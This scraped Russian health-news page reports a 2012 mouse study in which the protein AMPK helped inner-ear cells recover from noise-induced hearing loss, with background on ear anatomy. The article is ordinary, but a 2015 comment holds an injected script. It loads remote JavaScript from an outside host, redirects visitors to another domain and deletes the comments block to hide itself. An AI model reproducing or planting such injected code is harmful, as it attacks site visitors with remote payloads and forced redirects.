Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Белок, охраняющий слух  >>  Белок, охраняющий слух
 
Обратная связь
 

Белок, охраняющий слух

Размер шрифта
13 августа 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые нашли белок, который защищает чувствительные клетки внутреннего уха от повреждения при воздействии шума.

слух

Строение уха

Ухо – это парный орган, который находится в височных костях черепа и состоит из трех частей: наружного, среднего и внутреннего.

  • Наружное ухо представлено ушной раковиной и наружным слуховым проходом. Ушная  раковина улавливает звуки и направляет их в наружный слуховой проход, который проводит их на барабанную перепонку. Звуковые волны ударяются в барабанную перепонку и вызывают ее колебания. Барабанная перепонка отделяет среднее ухо от наружного.
  • В среднем ухе находятся три слуховые косточки, соединенные между собой: молоточек, наковальня и стремечко. Они передают звуковые колебания из наружного уха во внутреннее, одновременно усиливая их. Полость среднего уха связана с носоглоткой евстахиевой трубой, через которую выравнивается давление воздуха внутри и снаружи от барабанной перепонки.
  • Наиболее сложное строение имеет внутреннее ухо: оно состоит из преддверия, улитки и полукружных каналов. Во внутреннем ухе расположен не только орган слуха, но и орган равновесия. Слуховой частью внутреннего уха является улитка. Улитка заполнена специальной жидкостью и содержит кортиев орган, состоящий из нескольких рядов рецепторных клеток.

Восприятие звука

Звуковые колебания, возникающие в воздухе, передаются через наружный слуховой проход, барабанную перепонку и цепь слуховых косточек на жидкость улитки и кортиев орган. Раздражение клеток кортиева органа приводит к тому, что механические колебания жидкости, находящейся в улитке, превращаются в электрические импульсы, которые поступают в головной мозг.

Нарушения слуха

К нарушениям слуха относится глухота и тугоухость.

  • Глухота – это нарушение слуха, делающее невозможным восприятие речи.
  • Более легкие нарушения слуха называются тугоухостью.

Основной причиной нарушения слуха является воздействие шума как в быту, так и на производстве. Шум оказывает травмирующее действие на внутреннее ухо.

Механизм воздействия шума заключается в отсутствии достаточного отдыха, что приводит к истощению кортиева органа и перерождению его клеток.

Суть исследования

Ученые проводили исследование на мышах. Причем у мышей первой группы присутствовал особый белок AMPK, а у мышей второй группы он отсутствовал.

Остроту слуха мышей определяли по активности головного мозга. Все мыши подвергались воздействию шума, что привело к снижению слуха. Перед началом исследования острота слуха у всех мышей была одинаковой. После воздействия шума у большинства мышей первой группы слух восстановился через 2 недели, однако, у мышей второй группы восстановления не наблюдалось.

Результаты исследования

Полученные результаты лишь позволяют объяснить, почему при одинаковых условиях одни люди теряют слух, а другие – нет. Однако ученые высказали надежду, что новый белок можно будет использовать как для профилактики, так и для лечения нарушений слуха. А пока авторы исследования подчеркивают, что основным методом профилактики нарушений слуха по-прежнему остается ограничение воздействие шума.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Два популярных анальгетика вызывают потерю слуха   Что ваши уши говорят о вас?   Как почистить уши и не оглохнуть? Можно ли чистить уши ушными палочками?   Ученые научили слышать глухих  
25 октября 2012Ученые научили слышать глухих 10 августа 2012Новая стратегия, охраняющая слух
 
03 октября 2012Два популярных анальгетика вызывают потерю слуха! 16 января 2013То, что мы слышим, зависит от того, что мы делаем
 

Слайдшоу

1
ИЗ-ЗА ЧЕГО вы оглохнете? Как оглохнуть навсегда
Ушные инфекции у детей Что делать с ушной серой?
Как не оглохнуть на отдыхе Болезни, которые должен знать каждый родитель
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.